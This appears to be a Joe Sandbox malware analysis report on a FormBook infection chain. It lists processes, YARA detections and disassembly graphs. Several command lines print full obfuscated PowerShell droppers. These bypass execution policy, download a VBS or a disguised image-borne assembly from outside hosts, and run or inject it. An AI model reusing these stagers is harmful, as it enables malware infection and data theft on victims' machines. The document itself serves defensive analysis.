                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"
                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:23:37:52
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:3
                                                                                                                                                        Start time:23:37:53
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"
                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:4
                                                                                                                                                        Start time:23:37:55
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline"
                                                                                                                                                        Imagebase:0x4d0000
                                                                                                                                                        File size:2'141'552 bytes
                                                                                                                                                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:5
                                                                                                                                                        Start time:23:37:55
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5695.tmp" "c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP"
                                                                                                                                                        Imagebase:0xa10000
                                                                                                                                                        File size:46'832 bytes
                                                                                                                                                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:7
                                                                                                                                                        Start time:23:38:01
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS"
                                                                                                                                                        Imagebase:0xc40000
                                                                                                                                                        File size:147'456 bytes
                                                                                                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:23:38:02
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista
                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:23:38:02
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:23:38:27
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                                                                        Imagebase:0x4d0000
                                                                                                                                                        File size:56'368 bytes
                                                                                                                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:12
                                                                                                                                                        Start time:23:38:29
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe"
                                                                                                                                                        Imagebase:0xdf0000
                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:14
                                                                                                                                                        Start time:23:38:30
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\ieUnatt.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\ieUnatt.exe"
                                                                                                                                                        Imagebase:0x8f0000
                                                                                                                                                        File size:122'880 bytes
                                                                                                                                                        MD5 hash:4E9919DF2EF531B389ABAEFD35AD546E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:16
                                                                                                                                                        Start time:23:38:55
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                        Imagebase:0x7ff728280000
                                                                                                                                                        File size:676'768 bytes
                                                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Reset < >
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000003.2090570311.00000000067E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_3_67e0000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                                                          • Instruction ID: ab1811153c47a24f0ea25aa53932f4c4db6a920776a82df691a68c506a9aa64d
                                                                                                                                                          • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000003.2090570311.00000000067E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_3_67e0000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                                                          • Instruction ID: ab1811153c47a24f0ea25aa53932f4c4db6a920776a82df691a68c506a9aa64d
                                                                                                                                                          • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000003.2090570311.00000000067E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_3_67e0000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                                                          • Instruction ID: ab1811153c47a24f0ea25aa53932f4c4db6a920776a82df691a68c506a9aa64d
                                                                                                                                                          • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                                                          • Instruction Fuzzy Hash:

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:3.2%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:17%
                                                                                                                                                          Total number of Nodes:47
                                                                                                                                                          Total number of Limit Nodes:7
                                                                                                                                                          execution_graph 12488 5117480 12489 51174be 12488->12489 12490 51175fe 12488->12490 12489->12490 12496 5117c45 12489->12496 12504 5117a08 12489->12504 12513 5117a18 12489->12513 12522 5117da8 12489->12522 12491 51175df 12499 5117b9a 12496->12499 12501 5117c5e 12496->12501 12497 5117de8 URLDownloadToFileW 12500 5117ea8 12497->12500 12499->12496 12499->12497 12500->12491 12526 7ac45f4 12501->12526 12534 7ac4610 12501->12534 12505 5117a4c 12504->12505 12506 5117b30 12505->12506 12507 5117de8 URLDownloadToFileW 12505->12507 12510 5117c5e 12505->12510 12506->12491 12509 5117ea8 12507->12509 12509->12491 12511 7ac45f4 3 API calls 12510->12511 12512 7ac4610 3 API calls 12510->12512 12511->12510 12512->12510 12518 5117a4c 12513->12518 12514 5117de8 URLDownloadToFileW 12517 5117ea8 12514->12517 12515 5117b30 12515->12491 12517->12491 12518->12514 12518->12515 12519 5117c5e 12518->12519 12520 7ac45f4 3 API calls 12519->12520 12521 7ac4610 3 API calls 12519->12521 12520->12519 12521->12519 12523 5117cf9 12522->12523 12523->12522 12524 7ac45f4 4 API calls 12523->12524 12525 7ac4610 4 API calls 12523->12525 12524->12523 12525->12523 12528 7ac4610 12526->12528 12527 7ac4a93 12527->12501 12528->12527 12531 5117c45 4 API calls 12528->12531 12532 5117a18 4 API calls 12528->12532 12533 5117a08 4 API calls 12528->12533 12542 5111c00 12528->12542 12529 7ac4a34 12529->12501 12531->12529 12532->12529 12533->12529 12535 7ac4a93 12534->12535 12536 7ac4641 12534->12536 12535->12501 12536->12535 12538 5111c00 URLDownloadToFileW 12536->12538 12539 5117c45 4 API calls 12536->12539 12540 5117a18 4 API calls 12536->12540 12541 5117a08 4 API calls 12536->12541 12537 7ac4a34 12537->12501 12538->12537 12539->12537 12540->12537 12541->12537 12543 5117e00 URLDownloadToFileW 12542->12543 12545 5117ea8 12543->12545 12545->12529

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 5117a18-5117a4a 1 5117a90 0->1 2 5117a4c-5117a53 0->2 3 5117a93-5117acf 1->3 4 5117a55-5117a62 2->4 5 5117a64 2->5 11 5117ad5-5117ade 3->11 12 5117b58-5117b63 3->12 6 5117a66-5117a68 4->6 5->6 9 5117a6a-5117a6d 6->9 10 5117a6f-5117a71 6->10 13 5117a8e 9->13 14 5117a73-5117a80 10->14 15 5117a82 10->15 11->12 18 5117ae0-5117ae6 11->18 16 5117b72-5117b94 12->16 17 5117b65-5117b68 12->17 13->3 19 5117a84-5117a86 14->19 15->19 26 5117b9a-5117ba3 16->26 27 5117c5e-5117cf6 16->27 17->16 20 5117de8-5117e52 18->20 21 5117aec-5117af9 18->21 19->13 38 5117e54-5117e5a 20->38 39 5117e5d-5117e63 20->39 24 5117afb-5117b2e 21->24 25 5117b4f-5117b56 21->25 36 5117b30-5117b33 24->36 37 5117b4b 24->37 25->12 25->18 26->20 31 5117ba9-5117be7 26->31 65 5117cf9-5117d52 27->65 46 5117c01-5117c14 31->46 47 5117be9-5117bff 31->47 44 5117b35-5117b38 36->44 45 5117b3f-5117b48 36->45 37->25 38->39 42 5117e71-5117ea6 URLDownloadToFileW 39->42 43 5117e65-5117e6e 39->43 49 5117ea8-5117eae 42->49 50 5117eaf-5117ec3 42->50 43->42 44->45 51 5117c16-5117c1d 46->51 47->51 49->50 52 5117c42-5117c58 51->52 53 5117c1f-5117c30 51->53 52->26 52->27 53->52 59 5117c32-5117c3b 53->59 59->52 77 5117d55 call 7ac45f4 65->77 78 5117d55 call 7ac4610 65->78 70 5117d57-5117d60 71 5117d62-5117d78 70->71 72 5117d7a-5117d8d 70->72 73 5117d8f-5117d96 71->73 72->73 74 5117da5-5117daf 73->74 75 5117d98-5117d9e 73->75 74->65 75->74 77->70 78->70
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2197890729.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_5110000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9ff003e26009716db60156482607f7543a14cfb5d9fc71a9f70e38e0882ae7ee
                                                                                                                                                          • Instruction ID: 9d2e368ea1efa56cb0c9f13afe3419a76457208291acc02897511719a840a9a6
                                                                                                                                                          • Opcode Fuzzy Hash: 9ff003e26009716db60156482607f7543a14cfb5d9fc71a9f70e38e0882ae7ee
                                                                                                                                                          • Instruction Fuzzy Hash: 32E11D75A00219EFDB05DF98D984A9EFBB2FF88310F248169E905AB351C771ED81CB94

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 79 5111c00-5117e52 82 5117e54-5117e5a 79->82 83 5117e5d-5117e63 79->83 82->83 84 5117e71-5117ea6 URLDownloadToFileW 83->84 85 5117e65-5117e6e 83->85 86 5117ea8-5117eae 84->86 87 5117eaf-5117ec3 84->87 85->84 86->87
                                                                                                                                                          APIs
                                                                                                                                                          • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 05117E99
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2197890729.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_5110000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DownloadFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1407266417-0
                                                                                                                                                          • Opcode ID: 317ab62c1e1f28c9cd68a4ccc8b79c1e05cdae056de38da0e2f186c68667ab67
                                                                                                                                                          • Instruction ID: 238f39fcd678f54d959520b375f691649b53d437d49f0eea9c2a457fe8f7b6aa
                                                                                                                                                          • Opcode Fuzzy Hash: 317ab62c1e1f28c9cd68a4ccc8b79c1e05cdae056de38da0e2f186c68667ab67
                                                                                                                                                          • Instruction Fuzzy Hash: FF21F5B5D0161ADFCB04CF99D984A9EFBF4FB48710F10816AE918A7350D374A954CBA4

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
